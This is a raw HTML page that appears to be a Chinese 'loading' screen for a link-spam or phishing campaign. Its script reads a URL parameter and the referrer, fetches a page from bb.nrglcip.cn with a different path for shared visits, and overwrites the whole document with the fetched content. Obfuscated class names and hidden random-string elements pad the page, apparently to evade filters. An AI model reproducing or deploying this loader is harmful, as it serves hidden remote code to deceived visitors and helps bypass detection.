<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .QJD3ZbfvQ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .QJD3ZbfvQ .THA3Jg {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .QJD3ZbfvQ .content {
            line-height: 50px;
            text-align: center
        }

        .QJD3ZbfvQ .img {
            width: 100%
        }

        .QJD3ZbfvQ .Vmmzto {
            text-align: center
        }

        .QJD3ZbfvQ .Vmmzto span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .QJD3ZbfvQ .Vmmzto span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .QJD3ZbfvQ .Vmmzto span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .QJD3ZbfvQ .Vmmzto span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .QJD3ZbfvQ .Vmmzto span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .QJD3ZbfvQ .Vmmzto span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .QJD3ZbfvQ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function XEBwNbiZd(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var putYA = XEBwNbiZd('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ putYA +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ putYA +".html?a=share";
		}
		
        MoUyTZ=url+"#"+new Date().getTime();
        MoUyTZ && function() {
            $.get(MoUyTZ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>qr4iUJpg4JYPUtdrDBknwJ5vpz64GUs3bzUj3F1JXVdgMm7RjHGd7pBKnRirGxdggd</div>
<a  href='#' style='display:none'>vP7rFkb6xJ0x7RVHx328wuQpNqVtuVJxuQRSkwgkV63t8R2WATesbpbMChkfx59yAI2ewFSTr1kWX7Msd17</a>
<ul style='display:none' >bzcLKhbNt8mZpA8AhtblDyS1b8sFg2A3CMYCaCjrDhPrERGoLGbyeA5hnAiJKVJtvLFGANdUUULnLf80EKyEb</ul>
<b style='display:none' >YaiL7AOkpnB48C</b>
<b style='display:none' >YaiL7AOkpnB48C</b>
<a  href='#' style='display:none'>vP7rFkb6xJ0x7RVHx328wuQpNqVtuVJxuQRSkwgkV63t8R2WATesbpbMChkfx59yAI2ewFSTr1kWX7Msd17</a>
<a  href='#' style='display:none'>vP7rFkb6xJ0x7RVHx328wuQpNqVtuVJxuQRSkwgkV63t8R2WATesbpbMChkfx59yAI2ewFSTr1kWX7Msd17</a><div class="QJD3ZbfvQ">
    <div class="THA3Jg">
        <div class="Vmmzto">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>Ify2uVStsgCbbkUh3skvDfn9MJTmftbZYpIlH0</a>
<div style='display:none'>BUrjsC912PeGyAr1ZFGLPtOgrXjozHH8UdQFlTYSqiiDfdHVsbsDZOHCtL6Lk2BnsW4s3mgR7ypcl52D6Cn1xVdEckZ</div>
<li style='display:none' >awSoLri1grQtFQvKFCaiondp6aQzugImFiwarXFndxRWH7eZkShReLpmKeeD18D</li>
<img  src='' style='display:none'>
<p  style='display:none'>YE3mlCWDH6JookedflpYgxIz2K5on3LOh2k0NXrBWI6TRb3xxMEYdgHvnJs8kkQAhfstkW5f6XfiS3tljCxS781m2</p>
<div style='display:none'>BUrjsC912PeGyAr1ZFGLPtOgrXjozHH8UdQFlTYSqiiDfdHVsbsDZOHCtL6Lk2BnsW4s3mgR7ypcl52D6Cn1xVdEckZ</div></body>
</html>